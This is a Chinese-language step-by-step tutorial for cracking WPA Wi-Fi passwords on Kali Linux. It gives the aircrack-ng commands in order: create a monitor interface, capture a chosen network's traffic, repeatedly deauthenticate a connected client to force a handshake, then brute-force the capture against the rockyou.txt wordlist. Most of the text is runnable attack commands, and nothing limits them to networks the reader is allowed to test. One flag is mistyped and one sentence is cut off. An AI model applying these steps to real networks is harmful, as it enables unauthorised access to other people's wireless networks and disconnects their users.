获取一个词汇表
暴力攻击会列出一个单词列表,测试每种可能性。因此,为了执行一个测试,您需要一个单词列表来进行测试。Kali Linux已经提供了一些。如果你在不同的发行版上,你可以在网上找到一些,但是最好的方法是从Kali获得它们。加载一张LiveCD或者一个虚拟机来实现它们是值得的。
在Kali上,它们位于“/usr/share/wordlist”中。本教程将介绍的是“rockyou.txt”,但您可以使用其中任何a)
如果你不满意,你可以用Crunch创建你自己的词表。
当心,这些文件可能非常大。
扫描网络
首先,使用IP A
命令查看无线接口的名称,这里假设你看到的是wlan0。
然后,我们可以使用airmon-ng
创建虚拟监控接口。
$sudo airmon-ng start wlan0
输出结果是新虚拟接口的名称,mon0
。
将监控的结果转储到终端中,以便我们可以看到它们。
$sudo airodump-ng mon0
我们可以看到与我们所在地区的无线网络有关的数据表。
记下BSSID和通道号。
安装aircrack-ng
默认情况下,它们已经安装在Kali上。
如果你使用的是其他发行版上,那么使用下面命令安装。
$sudo apt install aircrack-ng
将结果转储到文件中
接下来,我们要将扫描结果记录到文件。
AirCrack将需要捕获日志以稍后在网络上运行蛮力攻击。
执行下面命令进行捕获。
$sudo airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wpa-crack mon0
断开客户端
打开一个新的终端。
运行airodump-ng
查看列表。它包含网络的BSSID以及客户端的BSSID。
选择其中一个,执行下面命令:
$sudo aireplay-ng -0 0 -c CLIENT BSSID -a NETWORK BSSID mon0
您可能需要在命令中添加“---ignore negative one”标志。
该命令将无限期运行,持续断开该客户端的连接。
在airodump-ng
窗口的第一行中,查找在该行末尾出现的与握手有关的消息。
如果很难看出,则使用--ignore-negative-one
,因为它的消息将占用相同的空间,导致握手消息在被覆盖之前闪烁一秒钟。
破解
使用aircrack-ng
命令开始破解
$sudo aircrack-ng -w rockyou.txt Documents/logs/wpa-crack-01.cap